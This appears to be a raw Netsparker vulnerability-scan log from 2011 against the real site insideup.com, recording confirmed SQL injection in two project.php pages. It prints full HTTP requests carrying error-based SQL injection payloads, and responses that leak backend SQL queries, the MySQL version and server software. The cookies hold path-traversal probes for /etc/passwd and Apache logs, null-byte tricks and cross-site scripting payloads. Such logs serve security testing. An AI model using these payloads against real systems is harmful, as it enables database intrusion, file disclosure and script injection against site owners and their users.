Set-Cookie: PHPSESSID=55goopk5csis14ucrp3ihleh33; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0mdup40cv6snsbek3637c3vi94; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=544lqup2abq45r6l90icof60l4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
